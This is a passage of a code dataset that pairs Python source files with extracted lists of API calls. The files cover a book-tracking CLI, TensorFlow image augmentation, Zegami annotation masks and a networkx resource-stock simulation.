] | [((128, 141), 'numpy.log', 'np.log', (['(F / K)'], {}), '(F / K)\n', (134, 141), True, 'import numpy as np\n'), ((405, 429), 'dcf.dcf', 'dcf', (['S', 'T'], {'method': 'method'}), '(S, T, method=method)\n', (408, 429), False, 'from dcf import dcf\n'), ((1097, 1121), 'dcf.dcf', 'dcf', (['S', 'T'], {'method': 'method'}), '(S, T, method=method)\n', (1100, 1121), False, 'from dcf import dcf\n'), ((451, 461), 'numpy.sqrt', 'np.sqrt', (['S'], {}), '(S)\n', (458, 461), True, 'import numpy as np\n'), ((1143, 1153), 'numpy.sqrt', 'np.sqrt', (['S'], {}), '(S)\n', (1150, 1153), True, 'import numpy as np\n'), ((258, 278), 'scipy.stats.norm.cdf', 'norm.cdf', (['(omega * d1)'], {}), '(omega * d1)\n', (266, 278), False, 'from scipy.stats import norm\n'), ((293, 313), 'scipy.stats.norm.cdf', 'norm.cdf', (['(omega * d2)'], {}), '(omega * d2)\n', (301, 313), False, 'from scipy.stats import norm\n')] |
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 12 13:00:50 2017
@author: Charlie
Program for storing and plotting information about reading habits: "bookworm"
IMPORTANT!! CLASS AND SUBFUNCTIONS SHOULD JUST DO PYTHON STUFF.
FUNCTIONS BELOW THE CLASS THAT CALL THE CLASS FNS ARE FOR PLAYING WITH CLICK
"""
import click #for command line interface
import pickle
import matplotlib.pyplot as plt
import numpy as np
import csv
@click.command()
@click.argument('filename')
def start_new_booklist(filename):
book_list = [] #empty list
with open(filename + '.pkl', 'wb') as f:
pickle.dump(book_list, f, pickle.HIGHEST_PROTOCOL)
if len(book_list) > 0:
with open(filename + '.txt', 'w') as txtfile:
for item in book_list:
print>>txtfile, item
@click.command()
@click.argument('filename')
@click.option('--method', type=click.Choice(['stdin', 'file']))
def add_new_book(filename, method):
"Get and save info for a new book"
filename = filename.encode('ascii','ignore')
if method == 'stdin':
with open(filename + '.pkl', 'rb+') as f:
book_list = pickle.load(f)
title = click.prompt('Enter the book title', type = str)
title_list = title.split()
search_string = ''
for word in title_list:
search_string += word
search_string += '+'
click.launch('https://www.goodreads.com/search?q=' + search_string)
author_last = click.prompt('Enter the author\'s LAST name', type = str)
author_first = click.prompt('Enter the author\'s FIRST name', type = str)
author_gender = click.prompt('Enter the author\'s gender (M/F/n)', type = str)
author_race = click.prompt('Enter the author\'s race', type = str)
author_nationality = click.prompt('Enter the author\'s nationality', type = str)
publication_year = click.prompt('Enter the publication year', type = int)
genre = click.prompt('Enter the book genre', type = str)
rating = click.prompt('Enter your rating (1-10)', type = int)
#insert info provided above into a dictionary held in the book list
book_list.insert(0, {'Title': title,
'Author last name': author_last,
'Author first name': author_first,
'Author gender': author_gender,
'Author race': author_race,
'Author nationality': author_nationality,
'Publication year': publication_year,
'Genre': genre,
'Rating': rating})
elif method == 'file':
title = click.prompt('Enter the book title', type = str)
title_list = title.split()
search_string = ''
for word in title_list:
search_string += word
search_string += '+'
click.launch('https://www.goodreads.com/search?q=' + search_string)
with open(filename + '.pkl', 'rb+') as f:
book_list = pickle.load(f)
temp_dict = {'Title:': title,
'Author last name:': [],
'Author first name:': [],
'Author gender:': [],
'Author race:': [],
'Author nationality:': [],
'Publication year:': [],
'Genre:': [],
'Rating:': []}
f = open('temp_book.txt', 'w+')
for key in temp_dict:
if key == 'Title:':
f.write(key + ' ' + title + '\n')
else:
f.write(key + '\n')
f.close()
#bring up the template for the user to edit
click.edit(filename='temp_book.txt')
#now read the file and parse into the book entry dictionary
input_dict = {}
with open('temp_book.txt') as f:
for line in f:
(key, val) = line.split(':')
input_dict[key] = val
book_list.insert(0, input_dict)
with open(filename + '.pkl', 'wb') as f:
pickle.dump(book_list, f, pickle.HIGHEST_PROTOCOL)
if len(book_list) > 0:
with open(filename + '.txt', 'w') as txtfile:
for item in book_list:
print>>txtfile, item
@click.command()
@click.argument('filename')
@click.option('--plot_style', default='pie') #options: 'pie' and 'hist'
def plot_author_gender(filename, plot_style):
with open(filename + '.pkl', 'rb') as f:
book_list = pickle.load(f)
men = 0.
women = 0.
other = 0.
for book in book_list:
gender = book['Author gender'].encode('ascii','ignore') #convert from
#...unicode to python string
if gender == 'M':
men += 1
elif gender == 'F':
women += 1
elif gender == 'n':
other += 1
counts = np.array([men, women, other])
labels = 'Men', 'Women', 'Other'
fig, ax = plt.subplots()
if plot_style == 'pie':
ax.pie(counts, labels=labels)
ax.axis('equal')
fig.savefig('piechart.png')
@click.command()
@click.argument('filename')
def export_to_csv(filename):
with open(filename + '.pkl', 'rb') as f:
book_list = pickle.load(f)
keys = book_list[0].keys()
with open(filename + '.csv', 'wb') as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(book_list)
#==============================================================================
# import pickle #for saving sictionary
#
# class Bookworm(object):
# def __init__(self):
# "Initialize Bookworm"
# pass
#
# def start_new_booklist(self):
# "Begin a new list of books"
# #instantiate book list (a list of dictionaries)
# #try to find saved dictionary
# #otherwise, make a new one:
# self.book_list = []
#
# def open_existing_booklist(self, name_to_open):
# "Open an existing list of books"
# with open(name_to_open + '_books.pkl', 'rb') as f:
# self.book_list = pickle.load(f)
#
# def add_new_book(self):
# "Get and save info for a new book"
# title = click.prompt('Enter the book title:', type = str)
# author_last = click.prompt('Enter the author\'s LAST name:', type = str)
# author_first = click.prompt('Enter the author\'s FIRST name:', type = str)
# author_gender = click.prompt('Enter the author\'s gender (M/F/n):', type = str)
# author_race = click.prompt('Enter the author\'s race:', type = str)
# author_nationality = click.prompt('Enter the author\'s nationality:', type = str)
# publication_year = click.prompt('Enter the publication year:', type = str)
# genre = click.prompt('Enter the book genre:', type = str)
# rating = click.prompt('Enter your rating (1-10):', type = int)
#
# #insert info provided above into a dictionary held in the book list
# self.book_list.insert(0, {'Title': title,
# 'Author last name': author_last,
# 'Author first name': author_first,
# 'Author gender': author_gender,
# 'Author race': author_race,
# 'Author nationality': author_nationality,
# 'Publication year': publication_year,
# 'Genre': genre,
# 'Rating': rating})
# # def make_template_input_file(self):
# # "Make template text file with parameters blank"
# #
# # def open_template_file_in_editor(self):
# # "Open the text file in an editor to get user input"
#
# # def export_info_to_csv(self):
# # "Export all attributes to a csv file"
#
# # def make_pie_chart_author_gender(self):
# # "Make a pie chart of author gender"
#
# def save_book_dictionary(self,book_list_name, save_as_name):
# "Save the dictionary, overwriting the old one, for reopening next time"
# with open(save_as_name + '_books.pkl', 'wb') as f:
#==============================================================================
# pickle.dump(book_list_name, f, pickle.HIGHEST_PROTOCOL)
| [
"pickle.dump",
"click.edit",
"click.argument",
"click.option",
"click.launch",
"click.command",
"click.Choice",
"pickle.load",
"numpy.array",
"csv.DictWriter",
"matplotlib.pyplot.subplots",
"click.prompt"
] | [((428, 443), 'click.command', 'click.command', ([], {}), '()\n', (441, 443), False, 'import click\n'), ((445, 471), 'click.argument', 'click.argument', (['"""filename"""'], {}), "('filename')\n", (459, 471), False, 'import click\n'), ((804, 819), 'click.command', 'click.command', ([], {}), '()\n', (817, 819), False, 'import click\n'), ((821, 847), 'click.argument', 'click.argument', (['"""filename"""'], {}), "('filename')\n", (835, 847), False, 'import click\n'), ((4379, 4394), 'click.command', 'click.command', ([], {}), '()\n', (4392, 4394), False, 'import click\n'), ((4396, 4422), 'click.argument', 'click.argument', (['"""filename"""'], {}), "('filename')\n", (4410, 4422), False, 'import click\n'), ((4424, 4467), 'click.option', 'click.option', (['"""--plot_style"""'], {'default': '"""pie"""'}), "('--plot_style', default='pie')\n", (4436, 4467), False, 'import click\n'), ((5202, 5217), 'click.command', 'click.command', ([], {}), '()\n', (5215, 5217), False, 'import click\n'), ((5219, 5245), 'click.argument', 'click.argument', (['"""filename"""'], {}), "('filename')\n", (5233, 5245), False, 'import click\n'), ((4969, 4998), 'numpy.array', 'np.array', (['[men, women, other]'], {}), '([men, women, other])\n', (4977, 4998), True, 'import numpy as np\n'), ((5050, 5064), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (5062, 5064), True, 'import matplotlib.pyplot as plt\n'), ((590, 640), 'pickle.dump', 'pickle.dump', (['book_list', 'f', 'pickle.HIGHEST_PROTOCOL'], {}), '(book_list, f, pickle.HIGHEST_PROTOCOL)\n', (601, 640), False, 'import pickle\n'), ((1167, 1213), 'click.prompt', 'click.prompt', (['"""Enter the book title"""'], {'type': 'str'}), "('Enter the book title', type=str)\n", (1179, 1213), False, 'import click\n'), ((1385, 1452), 'click.launch', 'click.launch', (["('https://www.goodreads.com/search?q=' + search_string)"], {}), "('https://www.goodreads.com/search?q=' + search_string)\n", (1397, 1452), False, 'import click\n'), ((1475, 1529), 'click.prompt', 'click.prompt', (['"""Enter the author\'s LAST name"""'], {'type': 'str'}), '("Enter the author\'s LAST name", type=str)\n', (1487, 1529), False, 'import click\n'), ((1556, 1611), 'click.prompt', 'click.prompt', (['"""Enter the author\'s FIRST name"""'], {'type': 'str'}), '("Enter the author\'s FIRST name", type=str)\n', (1568, 1611), False, 'import click\n'), ((1639, 1698), 'click.prompt', 'click.prompt', (['"""Enter the author\'s gender (M/F/n)"""'], {'type': 'str'}), '("Enter the author\'s gender (M/F/n)", type=str)\n', (1651, 1698), False, 'import click\n'), ((1724, 1773), 'click.prompt', 'click.prompt', (['"""Enter the author\'s race"""'], {'type': 'str'}), '("Enter the author\'s race", type=str)\n', (1736, 1773), False, 'import click\n'), ((1806, 1862), 'click.prompt', 'click.prompt', (['"""Enter the author\'s nationality"""'], {'type': 'str'}), '("Enter the author\'s nationality", type=str)\n', (1818, 1862), False, 'import click\n'), ((1893, 1945), 'click.prompt', 'click.prompt', (['"""Enter the publication year"""'], {'type': 'int'}), "('Enter the publication year', type=int)\n", (1905, 1945), False, 'import click\n'), ((1964, 2010), 'click.prompt', 'click.prompt', (['"""Enter the book genre"""'], {'type': 'str'}), "('Enter the book genre', type=str)\n", (1976, 2010), False, 'import click\n'), ((2030, 2080), 'click.prompt', 'click.prompt', (['"""Enter your rating (1-10)"""'], {'type': 'int'}), "('Enter your rating (1-10)', type=int)\n", (2042, 2080), False, 'import click\n'), ((4157, 4207), 'pickle.dump', 'pickle.dump', (['book_list', 'f', 'pickle.HIGHEST_PROTOCOL'], {}), '(book_list, f, pickle.HIGHEST_PROTOCOL)\n', (4168, 4207), False, 'import pickle\n'), ((879, 910), 'click.Choice', 'click.Choice', (["['stdin', 'file']"], {}), "(['stdin', 'file'])\n", (891, 910), False, 'import click\n'), ((4606, 4620), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (4617, 4620), False, 'import pickle\n'), ((5340, 5354), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (5351, 5354), False, 'import pickle\n'), ((5463, 5496), 'csv.DictWriter', 'csv.DictWriter', (['output_file', 'keys'], {}), '(output_file, keys)\n', (5477, 5496), False, 'import csv\n'), ((1136, 1150), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (1147, 1150), False, 'import pickle\n'), ((2727, 2773), 'click.prompt', 'click.prompt', (['"""Enter the book title"""'], {'type': 'str'}), "('Enter the book title', type=str)\n", (2739, 2773), False, 'import click\n'), ((2945, 3012), 'click.launch', 'click.launch', (["('https://www.goodreads.com/search?q=' + search_string)"], {}), "('https://www.goodreads.com/search?q=' + search_string)\n", (2957, 3012), False, 'import click\n'), ((3767, 3803), 'click.edit', 'click.edit', ([], {'filename': '"""temp_book.txt"""'}), "(filename='temp_book.txt')\n", (3777, 3803), False, 'import click\n'), ((3087, 3101), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (3098, 3101), False, 'import pickle\n')] |
import tensorflow as tf
import numpy as np
import cv2
import random
# Metodos para Data Augmentation siguiendo el Dataset API
# de tensorflow, donde
# x, y in dataset:
# x: tensor con la imagen de shape [w, h, 3]
# y: tenosr con one_hot encoding de las classes
# Realiza un flip aleatorio a la image
def random_flip(x, y):
x = tf.image.random_flip_left_right(x)
x = tf.image.random_flip_up_down(x)
return x, y
# Aplica augmentacion al color de las imagenes
def color_aug(x, y):
x = tf.image.random_hue(x, 0.08)
x = tf.image.random_saturation(x, 0.6, 1.6)
x = tf.image.random_brightness(x, 0.05)
x = tf.image.random_contrast(x, 0.7, 1.3)
return x, y
def expand_image(x, y):
image = np.array(x)
height, width, depth = image.shape
ratio = random.uniform(1, 2)
left = random.uniform(0, width*ratio - width)
top = random.uniform(0, height*ratio - height)
expand_image = np.zeros((int(height*ratio), int(width*ratio), depth),
dtype=image.dtype)
expand_image[:, :, :] = np.mean(image)
expand_image[int(top):int(top+height), int(left):int(left+width)] = image
image = tf.convert_to_tensor(expand_image)
return image, y
# Aplica una expansion a la image
class ImageExpand():
def __init__(self, ratio, fill_type="w"):
self.ratio = ratio
self.fill_type = fill_type
def expand_image(self, x, y):
image = np.array(x)
height, width, depth = image.shape
ratio = random.uniform(1, self.ratio)
left = random.uniform(0, width*ratio - width)
top = random.uniform(0, height*ratio - height)
expand_image = np.zeros((int(height*ratio), int(width*ratio), depth),
dtype=image.dtype)
expand_image[:, :, :] = np.mean(image)
expand_image[int(top):int(top+height), int(left):int(left+width)] = image
image = expand_image
return tf.convert_to_tensor(image), y
| [
"random.uniform",
"tensorflow.image.random_flip_up_down",
"tensorflow.image.random_contrast",
"tensorflow.convert_to_tensor",
"tensorflow.image.random_hue",
"tensorflow.image.random_flip_left_right",
"numpy.mean",
"numpy.array",
"tensorflow.image.random_saturation",
"tensorflow.image.random_bright... | [((337, 371), 'tensorflow.image.random_flip_left_right', 'tf.image.random_flip_left_right', (['x'], {}), '(x)\n', (368, 371), True, 'import tensorflow as tf\n'), ((380, 411), 'tensorflow.image.random_flip_up_down', 'tf.image.random_flip_up_down', (['x'], {}), '(x)\n', (408, 411), True, 'import tensorflow as tf\n'), ((506, 534), 'tensorflow.image.random_hue', 'tf.image.random_hue', (['x', '(0.08)'], {}), '(x, 0.08)\n', (525, 534), True, 'import tensorflow as tf\n'), ((543, 582), 'tensorflow.image.random_saturation', 'tf.image.random_saturation', (['x', '(0.6)', '(1.6)'], {}), '(x, 0.6, 1.6)\n', (569, 582), True, 'import tensorflow as tf\n'), ((591, 626), 'tensorflow.image.random_brightness', 'tf.image.random_brightness', (['x', '(0.05)'], {}), '(x, 0.05)\n', (617, 626), True, 'import tensorflow as tf\n'), ((635, 672), 'tensorflow.image.random_contrast', 'tf.image.random_contrast', (['x', '(0.7)', '(1.3)'], {}), '(x, 0.7, 1.3)\n', (659, 672), True, 'import tensorflow as tf\n'), ((727, 738), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (735, 738), True, 'import numpy as np\n'), ((792, 812), 'random.uniform', 'random.uniform', (['(1)', '(2)'], {}), '(1, 2)\n', (806, 812), False, 'import random\n'), ((825, 865), 'random.uniform', 'random.uniform', (['(0)', '(width * ratio - width)'], {}), '(0, width * ratio - width)\n', (839, 865), False, 'import random\n'), ((874, 916), 'random.uniform', 'random.uniform', (['(0)', '(height * ratio - height)'], {}), '(0, height * ratio - height)\n', (888, 916), False, 'import random\n'), ((1045, 1059), 'numpy.mean', 'np.mean', (['image'], {}), '(image)\n', (1052, 1059), True, 'import numpy as np\n'), ((1150, 1184), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['expand_image'], {}), '(expand_image)\n', (1170, 1184), True, 'import tensorflow as tf\n'), ((1421, 1432), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (1429, 1432), True, 'import numpy as np\n'), ((1494, 1523), 'random.uniform', 'random.uniform', (['(1)', 'self.ratio'], {}), '(1, self.ratio)\n', (1508, 1523), False, 'import random\n'), ((1540, 1580), 'random.uniform', 'random.uniform', (['(0)', '(width * ratio - width)'], {}), '(0, width * ratio - width)\n', (1554, 1580), False, 'import random\n'), ((1593, 1635), 'random.uniform', 'random.uniform', (['(0)', '(height * ratio - height)'], {}), '(0, height * ratio - height)\n', (1607, 1635), False, 'import random\n'), ((1776, 1790), 'numpy.mean', 'np.mean', (['image'], {}), '(image)\n', (1783, 1790), True, 'import numpy as np\n'), ((1918, 1945), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['image'], {}), '(image)\n', (1938, 1945), True, 'import tensorflow as tf\n')] |
# -*- coding: utf-8 -*-
# Copyright 2021 Zegami Ltd
"""Annotation functionality."""
import base64
import io
import os
import numpy as np
from PIL import Image
class _Annotation():
"""Base (abstract) class for annotations."""
# Define the string annotation TYPE in child classes
TYPE = None
UPLOADABLE_DESCRIPTION = None
def __init__(self, collection, annotation_data, source=None):
"""
!! STOP !! Instantiate a non-hidden subclass instead.
Each subclass should call this __init__ AFTER assignment of members
so that checks can be performed.
If making a new annotation to upload, use collection.upload_annotation
instead.
"""
self._collection = collection # Collection instance
self._source = source # Source instance
self._data = annotation_data # { imageset_id, image_index, type, annotation }
# Enforce abstract requirement
if self.TYPE is None:
raise TypeError(
'Do not instantiate the base _Annotation class. It is '
'intended to be an abstract class, try one of the non-hidden '
'Annotation classes instead.')
@property
def collection():
pass
@collection.getter
def collection(self):
"""The collection this annotation belongs to. """
return self._collection
@property
def source():
pass
@source.getter
def source(self):
"""The source this annotation belongs to in its collection. """
return self._source
@property
def _image_index():
pass
@_image_index.getter
def _image_index(self):
"""The image-space index of this annotation's owner's image. """
if 'image_index' not in self._data.keys():
raise ValueError('Annotation\'s _data did not contain '
'\'image_index\': {}'.format(self._data))
return self._data['image_index']
@property
def row_index():
pass
@row_index.getter
def row_index(self):
"""The data-row-space index of this annotation's owner. """
lookup = self.collection._get_image_meta_lookup(self.source)
return lookup.index(self._image_index)
@property
def _imageset_id():
pass
@_imageset_id.getter
def _imageset_id(self):
"""Shortcut for the owning collection's (source's) imageset ID. """
return self.collection._get_imageset_id(self.source)
# -- Abstract/virtual, must be implemented in children --
@classmethod
def create_uploadable(cls) -> None:
"""Extend in children to include actual annotation data. """
return {
'type': cls.TYPE,
'format': None,
'annotation': None
}
def view(self):
"""Abstract method to view a representation of the annotation. """
return NotImplementedError(
'\'view\' method not implemented for annotation type: {}'
.format(self.TYPE))
class AnnotationMask(_Annotation):
"""An annotation comprising a bitmask and some metadata.
To view the masks an image, use mask.view().
Note: Providing imageset_id and image_index is not mandatory and can be
obtained automatically, but this is slow and can cause unnecessary
re-downloading of data."""
TYPE = 'mask'
UPLOADABLE_DESCRIPTION = """
'Mask annotation data includes the actual mask (as a base64 encoded
'png string), a width and height, bounding box, and score if generated
by a model (else None). """
def __init__(self, collection, row_index, source=None, from_filepath=None,
from_url=None, imageset_id=None, image_index=None):
super().__init__(self, collection, row_index, source, from_filepath, from_url, imageset_id, image_index)
@classmethod
def create_uploadable(cls, bool_mask, class_id):
"""Creates a data package ready to be uploaded with a collection's
.upload_annotation().
Note: The output of this is NOT an annotation, it is used to upload
annotation data to Zegami, which when retrieved will form an
annotation. """
if type(bool_mask) != np.ndarray:
raise TypeError('Expected bool_mask to be a numpy array, not a {}'
.format(type(bool_mask)))
if bool_mask.dtype != bool:
raise TypeError('Expected bool_mask.dtype to be bool, not {}'
.format(bool_mask.dtype))
if len(bool_mask.shape) != 2:
raise ValueError('Expected bool_mask to have a shape of 2 '
'(height, width), not {}'.format(bool_mask.shape))
h, w = bool_mask.shape
# Encode the mask array as a 1 bit PNG encoded as base64
mask_image = Image.fromarray(bool_mask.astype('uint8') * 255).convert('1')
mask_buffer = io.BytesIO()
mask_image.save(mask_buffer, format='PNG')
byte_data = mask_buffer.getvalue()
mask_b64 = base64.b64encode(byte_data)
mask_string = "data:image/png;base64,{}".format(mask_b64.decode("utf-8"))
bounds = cls.get_bool_mask_bounds(bool_mask)
roi = {
'xmin': int(bounds['left']),
'xmax': int(bounds['right']),
'ymin': int(bounds['top']),
'ymax': int(bounds['bottom']),
'width': int(bounds['right'] - bounds['left']),
'height': int(bounds['bottom'] - bounds['top'])
}
data = {
'mask': mask_string,
'width': int(w),
'height': int(h),
'score': None,
'roi': roi
}
uploadable = super().create_uploadable()
uploadable['format'] = '1UC1'
uploadable['annotation'] = data
uploadable['class_id'] = int(class_id)
return uploadable
def view(self):
"""View the mask as an image. """
# NOT TESTED
im = Image.fromarray(self.mask_uint8)
im.show()
@property
def mask_uint8():
pass
@mask_uint8.getter
def mask_uint8(self):
"""Mask data as a uint8 numpy array (0 -> 255). """
return self.mask_bool.astype(np.uint8) * 255
@property
def mask_bool():
pass
@mask_bool.getter
def mask_bool(self):
"""Mask data as a bool numpy array. """
a = self._get_bool_arr()
if len(a.shape) != 2:
raise ValueError('Unexpected mask_bool shape: {}'.format(a.shape))
if a.dtype != bool:
raise TypeError('Unexpected mask_bool dtype: {}'.format(a.dtype))
return a
@staticmethod
def _read_bool_arr(local_fp):
"""Reads the boolean array from a locally stored file. Useful for
creation of an upload package. """
# TODO - Not finished/tested
assert os.path.exists(local_fp), 'File not found: {}'.format(local_fp)
assert os.path.isfile(local_fp), 'Path is not a file: {}'.format(local_fp)
arr = np.array(Image.open(local_fp), dtype='uint8')
return arr
@staticmethod
def parse_bool_masks(bool_masks):
"""Checks the masks for correct data types, and ensures a shape of
[h, w, N]. """
if type(bool_masks) != np.ndarray:
raise TypeError('Expected bool_masks to be a numpy array, not {}'
.format(type(bool_masks)))
if bool_masks.dtype != bool:
raise TypeError('Expected bool_masks to have dtype == bool, not {}'
.format(bool_masks.dtype))
# If there is only one mask with no third shape value, insert one
if len(bool_masks.shape) == 2:
bool_masks = np.expand_dims(bool_masks, -1)
return bool_masks
@classmethod
def get_bool_mask_bounds(cls, bool_mask):
"""Returns the { top, bottom, left, right } of the boolean array
associated with this annotation, calculated from its array data. """
bool_mask = cls.parse_bool_masks(bool_mask)[:, :, 0]
rows = np.any(bool_mask, axis=1)
cols = np.any(bool_mask, axis=0)
try:
top, bottom = np.where(rows)[0][[0, -1]]
left, right = np.where(cols)[0][[0, -1]]
except Exception:
top, bottom, left, right = 0, 0, 0, 0
return {'top': top, 'bottom': bottom, 'left': left, 'right': right}
@staticmethod
def base64_to_boolmask(b64_data):
"""Converts str base64 annotation data from Zegami into a boolean
mask. """
if type(b64_data) is not str:
raise TypeError('b64_data should be a str, not {}'.format(type(b64_data)))
if b64_data.startswith('data:'):
b64_data = b64_data.split(',', 1)[-1]
img = Image.open(io.BytesIO(base64.b64decode(b64_data)))
img_arr = np.array(img)
premax = img_arr.max()
arr_int = np.array(np.array(img) * 255 if premax < 2 else np.array(img), dtype='uint8')
return arr_int > 125
| [
"io.BytesIO",
"os.path.exists",
"numpy.expand_dims",
"base64.b64decode",
"PIL.Image.open",
"numpy.any",
"os.path.isfile",
"numpy.where",
"base64.b64encode",
"numpy.array",
"PIL.Image.fromarray"
] | [((4971, 4983), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (4981, 4983), False, 'import io\n'), ((5097, 5124), 'base64.b64encode', 'base64.b64encode', (['byte_data'], {}), '(byte_data)\n', (5113, 5124), False, 'import base64\n'), ((6042, 6074), 'PIL.Image.fromarray', 'Image.fromarray', (['self.mask_uint8'], {}), '(self.mask_uint8)\n', (6057, 6074), False, 'from PIL import Image\n'), ((6941, 6965), 'os.path.exists', 'os.path.exists', (['local_fp'], {}), '(local_fp)\n', (6955, 6965), False, 'import os\n'), ((7020, 7044), 'os.path.isfile', 'os.path.isfile', (['local_fp'], {}), '(local_fp)\n', (7034, 7044), False, 'import os\n'), ((8160, 8185), 'numpy.any', 'np.any', (['bool_mask'], {'axis': '(1)'}), '(bool_mask, axis=1)\n', (8166, 8185), True, 'import numpy as np\n'), ((8201, 8226), 'numpy.any', 'np.any', (['bool_mask'], {'axis': '(0)'}), '(bool_mask, axis=0)\n', (8207, 8226), True, 'import numpy as np\n'), ((8949, 8962), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (8957, 8962), True, 'import numpy as np\n'), ((7111, 7131), 'PIL.Image.open', 'Image.open', (['local_fp'], {}), '(local_fp)\n', (7121, 7131), False, 'from PIL import Image\n'), ((7810, 7840), 'numpy.expand_dims', 'np.expand_dims', (['bool_masks', '(-1)'], {}), '(bool_masks, -1)\n', (7824, 7840), True, 'import numpy as np\n'), ((8902, 8928), 'base64.b64decode', 'base64.b64decode', (['b64_data'], {}), '(b64_data)\n', (8918, 8928), False, 'import base64\n'), ((9060, 9073), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (9068, 9073), True, 'import numpy as np\n'), ((8267, 8281), 'numpy.where', 'np.where', (['rows'], {}), '(rows)\n', (8275, 8281), True, 'import numpy as np\n'), ((8320, 8334), 'numpy.where', 'np.where', (['cols'], {}), '(cols)\n', (8328, 8334), True, 'import numpy as np\n'), ((9021, 9034), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (9029, 9034), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 26 14:55:35 2019
@author: hindesa
"""
import random
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
# Random resource network
# Using ecological subsystem only version of TSL
#Assume n,m same for both social networks
#total no. agents
n = 20
#number of links
#May change depending on how network is generated, links are added
#if an isolated node is made
m = 30
mu = 1.2
ec = 0.483/50. #level of effort (cooperators) #level of effort (defectors)
ed = mu*ec
Rmax = 250
c = random.sample(range(20, 60), n)
d, q = 50, 1
# Network
G = nx.gnm_random_graph(n, m)
# Need network to have no isolated nodes
# If there is an isolated node, find it and link it the next node
for k in range(n):
if len([j for j in G.neighbors(k)]) == 0:
G.add_edge(k,(k+1))
else:
pass
m = G.number_of_edges() #Reassign in case rewire
#Populate resources with random levels of stock
stocks = random.sample(range(int(np.floor(Rmax/4)),Rmax), n)
for j in range(n):
G.node[j]['node_size'] = stocks[j]
# Randomize coupling strengths between 0.1 and 0.5
deltas = random.sample(set(np.linspace(0.1, 0.5, num=50)), m)
k = 0
for u,v,l in G.edges(data=True):
l['weight'] = deltas[k]
k += 1
nx.draw_networkx(G, pos=None, node_size = stocks)
plt.title('Initial Network')
plt.show()
# Extraction function
def ext(f):
E = n*(f*ec+(1-f)*ed)
return E
# initial condition
# static fraction of cooperators
fc = 0.7
R = 200
t = 0
tEnd = 30 #end point
dt = 0.1 #time step
# Lists to store values to plot later
time = []
rLists = []
k = 0
while k < n:
rLists.append([])
k += 1
while t<tEnd:
R = np.zeros(n)
for k in range(n):
R[k] = G.node[k]['node_size']
dRself = c[k] - d*(R[k]/Rmax)**2 - q*ext(fc)*R[k]
differences = [G.edges[j,k]['weight']*(G.node[j]['node_size'] - R[k]) for j in G.neighbors(k)]
inOutFlow = sum(differences)
dR = (dRself + inOutFlow)*dt
R[k] += dR
G.node[k]['node_size'] += dR
#update quantities
t += dt
#append lists
time.append(t)
for k in range(n):
rLists[k].append(R[k])
# Plot
plt.xlabel('Time')
plt.ylabel('Resource Stock')
for i in range(n):
plt.plot(time, rLists[i])
plt.show()
stocks = nx.get_node_attributes(G, 'node_size')
sizes = [stocks[k] for k in stocks]
nx.draw_networkx(G, pos=None, node_size = sizes)
plt.title('Final Network')
plt.show()
| [
"matplotlib.pyplot.title",
"matplotlib.pyplot.show",
"matplotlib.pyplot.plot",
"numpy.floor",
"numpy.zeros",
"networkx.draw_networkx",
"numpy.linspace",
"networkx.get_node_attributes",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"networkx.gnm_random_graph"
] | [((611, 636), 'networkx.gnm_random_graph', 'nx.gnm_random_graph', (['n', 'm'], {}), '(n, m)\n', (630, 636), True, 'import networkx as nx\n'), ((1280, 1327), 'networkx.draw_networkx', 'nx.draw_networkx', (['G'], {'pos': 'None', 'node_size': 'stocks'}), '(G, pos=None, node_size=stocks)\n', (1296, 1327), True, 'import networkx as nx\n'), ((1331, 1359), 'matplotlib.pyplot.title', 'plt.title', (['"""Initial Network"""'], {}), "('Initial Network')\n", (1340, 1359), True, 'import matplotlib.pyplot as plt\n'), ((1360, 1370), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1368, 1370), True, 'import matplotlib.pyplot as plt\n'), ((2228, 2246), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Time"""'], {}), "('Time')\n", (2238, 2246), True, 'import matplotlib.pyplot as plt\n'), ((2247, 2275), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Resource Stock"""'], {}), "('Resource Stock')\n", (2257, 2275), True, 'import matplotlib.pyplot as plt\n'), ((2325, 2335), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2333, 2335), True, 'import matplotlib.pyplot as plt\n'), ((2346, 2384), 'networkx.get_node_attributes', 'nx.get_node_attributes', (['G', '"""node_size"""'], {}), "(G, 'node_size')\n", (2368, 2384), True, 'import networkx as nx\n'), ((2421, 2467), 'networkx.draw_networkx', 'nx.draw_networkx', (['G'], {'pos': 'None', 'node_size': 'sizes'}), '(G, pos=None, node_size=sizes)\n', (2437, 2467), True, 'import networkx as nx\n'), ((2471, 2497), 'matplotlib.pyplot.title', 'plt.title', (['"""Final Network"""'], {}), "('Final Network')\n", (2480, 2497), True, 'import matplotlib.pyplot as plt\n'), ((2498, 2508), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2506, 2508), True, 'import matplotlib.pyplot as plt\n'), ((1707, 1718), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (1715, 1718), True, 'import numpy as np\n'), ((2299, 2324), 'matplotlib.pyplot.plot', 'plt.plot', (['time', 'rLists[i]'], {}), '(time, rLists[i])\n', (2307, 2324), True, 'import matplotlib.pyplot as plt\n'), ((1164, 1193), 'numpy.linspace', 'np.linspace', (['(0.1)', '(0.5)'], {'num': '(50)'}), '(0.1, 0.5, num=50)\n', (1175, 1193), True, 'import numpy as np\n'), ((994, 1012), 'numpy.floor', 'np.floor', (['(Rmax / 4)'], {}), '(Rmax / 4)\n', 